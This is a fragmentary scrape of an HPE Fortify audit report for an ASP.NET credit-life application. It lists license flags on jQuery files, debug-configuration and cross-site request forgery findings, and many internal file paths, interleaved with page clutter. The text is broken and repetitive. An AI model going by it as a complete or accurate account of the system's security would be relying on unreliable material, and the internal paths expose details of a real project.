i(this,t)).init())})},e.fn.numeric_input.defaults={decimal:",",leadingZeroCheck:!
0,initialParse:!0,parseOnBlur:!0,allowNegative:!1}})(jQuery,window,document);

High
Content/Scripts/jquery-1.10.2-vsdoc.js, line 2 (Potentially Banned License: GPL)
Issue Details
Sink Details
Sink: Comment
2
Taint Flags:
1 /* NUGET: BEGIN LICENSE TEXT
2 *
3 * Microsoft grants you the right to use these script files for the sole
4 * purpose of either: (i) interacting through your browser with the Microsoft
5 * website or online service, subject to the applicable licensing or use
6 * terms; or (ii) using the files as included with a Microsoft product subject
7 * to that product's license terms. Microsoft reserves all other rights to the

High
Tools/jquery-1.10.2.intellisense.js, line 0 (Potentially Banned License: GPL)
Issue Details
Sink Details
Sink: Comment
Oct 5, 2018, 5:40 PM 126

High
Tools/jquery-1.10.2.intellisense.js, line 0 (Potentially Banned License: GPL)
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/packages/jQuery.1.10.2/Tools/jquery-1.10.2.intellisense.js:0

Taint Flags:
1 /* NUGET: BEGIN LICENSE TEXT
2 *
3 * Microsoft grants you the right to use these script files for the sole
4 * purpose of either: (i) interacting through your browser with the Microsoft
5 * website or online service, subject to the applicable licensing or use
6 * terms; or (ii) using the files as included with a Microsoft product subject
7 * to that product's license terms. Microsoft reserves all other rights to the
Oct 5, 2018, 5:40 PM 127

Oct 5, 2018, 5:40 PM 128

CLS DeveloperWorkbook

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CLS DeveloperWorkbook

Uploaded by

Copyright:

Available Formats

HPE Security Fortify Audit Workbench

Oct 5, 2018, 5:40 PM 2

This section provides an overview of the issues uncovered during analysis.

Project Name: 20181005_CLS Issues by Priority

Oct 5, 2018, 5:40 PM 3

Date of Last Analysis: Oct 5, 2018, 5:38 PM Engine Version: 17.10.0156

Oct 5, 2018, 5:40 PM 4

Oct 5, 2018, 5:40 PM 5

ASP.NET Misconfiguration: Debug Information (3 issues)

Oct 5, 2018, 5:40 PM 6

ASP.NET Misconfiguration: Debug Information Medium

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.bin

Oct 5, 2018, 5:40 PM 7

Oct 5, 2018, 5:40 PM 8

var req = new XMLHttpRequest();

var req = new XMLHttpRequest();

Oct 5, 2018, 5:40 PM 9

RequestBuilder rb = new RequestBuilder(RequestBuilder.POST, "/new_user");

Additional mitigation techniques include:

Oct 5, 2018, 5:40 PM 10

Cross-Site Request Forgery Low

Package: Code.Sampoerna.Credit Life.5th Scan.

Oct 5, 2018, 5:40 PM 11

Package: Code.Sampoerna.Credit Life.5th Scan.

Package: Code.Sampoerna.Credit Life.5th Scan.

Oct 5, 2018, 5:40 PM 12

Package: Code.Sampoerna.Credit Life.5th Scan.

Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/

Oct 5, 2018, 5:40 PM 13

Scan Engine: SCA (Content)

Package: Code.Sampoerna.Credit Life.5th Scan.

Package: Code.Sampoerna.Credit Life.5th Scan.

Oct 5, 2018, 5:40 PM 14

Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/

Package: Code.Sampoerna.Credit Life.5th Scan.

Oct 5, 2018, 5:40 PM 15

Scan Engine: SCA (Content)

Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/

Package: Code.Sampoerna.Credit Life.5th Scan.

Oct 5, 2018, 5:40 PM 16

File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/UserGroup/

Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.BMI

Oct 5, 2018, 5:40 PM 17

Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.CutOff

Oct 5, 2018, 5:40 PM 18

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.Group

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.MP

Oct 5, 2018, 5:40 PM 19

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.Partner

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.Product

Oct 5, 2018, 5:40 PM 20

Package: Code.Sampoerna.Credit Life.5th Scan.

Package: Code.Sampoerna.Credit Life.5th Scan.

Oct 5, 2018, 5:40 PM 21

Package: Code.Sampoerna.Credit Life.5th Scan.

Oct 5, 2018, 5:40 PM 22

Package: Code.Sampoerna.Credit Life.5th Scan.

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.Sumins

Oct 5, 2018, 5:40 PM 23

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Reg.Views.Registration

Package: Code.Sampoerna.Credit Life.5th Scan.